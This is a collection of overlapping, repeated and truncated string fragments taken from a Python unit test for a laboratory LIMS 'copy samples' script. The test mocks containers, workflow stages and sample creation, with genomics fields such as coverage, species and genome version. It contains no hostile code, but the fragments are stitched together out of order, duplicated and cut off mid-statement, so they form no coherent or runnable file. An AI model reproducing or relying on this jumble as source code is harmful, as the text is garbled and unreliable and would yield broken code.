"# test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name:",
"test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact}",
"= Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create",
"'99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA",
"DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required",
"patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list",
"'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1',",
"'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest",
"'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0,",
"as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0],",
"FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri')",
"fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA",
"1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\", \"Remove From Processing EG",
"self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create",
"= patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run()",
"Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']),",
"import Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP):",
"self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name':",
"'split', 'Analysis Type': 'None', 'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus",
"] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims,",
"self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws,",
"'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab",
"creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input",
"(X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis",
"= FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage =",
"Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type': 'Variant Calling",
"ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\", \"Remove From Processing EG 1.0",
"self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with( self.epp.lims, inputs=inputs_project_step_creation, protocol_step=self.mocked_step, container_type_name='Tube'",
"from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker",
"'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow':",
"'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container",
"'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq",
"}}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow':",
"cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis':",
"gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container':",
"return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input':",
"WF\", \"Remove From Processing EG 1.0 ST\") # test step creation inputs_project_step_creation =",
"}}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST')",
"test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[])",
"fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA",
"inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in",
"TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step))",
"cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant",
"'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process =",
"'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self):",
"} def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers",
"self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step)",
"1.0 ST\") # test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name:",
"Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared",
"= [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict):",
"step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def",
"EG 1.0 WF\", \"Remove From Processing EG 1.0 ST\") # test step creation",
"Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step",
"120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid",
"'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version':",
"'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type':",
"@staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params",
"tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage',",
"'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No',",
"CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage",
"= CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001',",
"cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30,",
"'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage",
"'User Prepared Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species':",
"{'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)':",
"'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis':",
"Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']),",
"'96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker()",
"(Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library': 'Yes', 'Rapid Analysis':",
"import Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common import",
"\"Remove From Processing EG 1.0 ST\") # test step creation inputs_project_step_creation = []",
"sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96 well",
"TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch',",
"'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep',",
"'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery':",
"'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA Sample",
"FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch",
"inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with(",
"patch.object(Container, 'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2,",
"'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60,",
"(X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared",
"'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name':",
"= { 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']),",
"{'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem",
"'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0],",
"= [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow':",
"(Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type': 'Variant Calling gatk',",
"Prepared Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo",
"'merged', 'User Prepared Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No',",
"self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with( self.epp.lims, inputs=inputs_project_step_creation, protocol_step=self.mocked_step, container_type_name='Tube' )",
"1.0 WF\", \"Remove From Processing EG 1.0 ST\") # test step creation inputs_project_step_creation",
"'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01',",
"'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq",
"fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create',",
"'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano",
"'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type': 'Variant",
"Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19', }},",
"from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage =",
"Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), },",
"gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo",
"get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = {",
"'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\", \"Remove",
"def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name': 'X99999', 'process_id':",
"'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample,",
"Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims,",
"import sorted from itertools import cycle from unittest.mock import patch, Mock from pyclarity_lims.entities",
"'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano",
"[{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq",
"EG 1.0 ST\") # test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = {",
"'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required",
"Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]),",
"\"Remove From Processing EG 1.0 WF\", \"Remove From Processing EG 1.0 ST\") #",
"Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240,",
"setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999',",
"cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999'",
"CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name':",
"return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name': 'X99999',",
"'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params = { 'nb_input': 2, 'project_name':",
"as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position':",
"cycle from unittest.mock import patch, Mock from pyclarity_lims.entities import Sample from scripts.copy_samples import",
"Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id':",
"pyclarity_lims.entities import Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common",
"{ self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with( self.epp.lims, inputs=inputs_project_step_creation,",
"cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free",
"Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120,",
"= { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with( self.epp.lims,",
"Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, {",
"mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True)",
"patch, Mock from pyclarity_lims.entities import Sample from scripts.copy_samples import Container from scripts.copy_samples import",
"Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\", \"Remove From",
"'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120,",
"Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def",
"from itertools import cycle from unittest.mock import patch, Mock from pyclarity_lims.entities import Sample",
"2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': { 'Prep",
"= fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create =",
"'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }},",
"240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes',",
"'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0",
"expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep",
"'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list)",
"psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1',",
"Mock from pyclarity_lims.entities import Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples",
"with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{",
"well plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims",
"Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species':",
"def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers =",
"patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return",
"EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\", \"Remove From Processing",
"= Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod",
"{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq",
"scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}),",
"'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample",
"'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library': 'Yes',",
"pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing",
"'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome",
"'None', 'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version':",
"'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample",
"musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input':",
"Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)':",
"WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\",",
"plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims =",
"'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery':",
"'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared",
"pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0 WF\", \"Remove From Processing EG 1.0 ST\")",
"'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)':",
"'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample",
"actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container):",
"'X99999P001B01']), 'sample_udfs': { 'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA",
"Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as",
"self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc:",
"\\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1],",
"DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User",
"'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'},",
"Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library': 'Yes', 'Rapid",
"EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG 1.0",
"[] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input])",
"return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list =",
"unittest.mock import patch, Mock from pyclarity_lims.entities import Sample from scripts.copy_samples import Container from",
"fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')),",
"self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf':",
"import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}]))",
"PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split',",
"return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container)",
"'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield",
"Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19', }}, ]",
"import cycle from unittest.mock import patch, Mock from pyclarity_lims.entities import Sample from scripts.copy_samples",
"'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage",
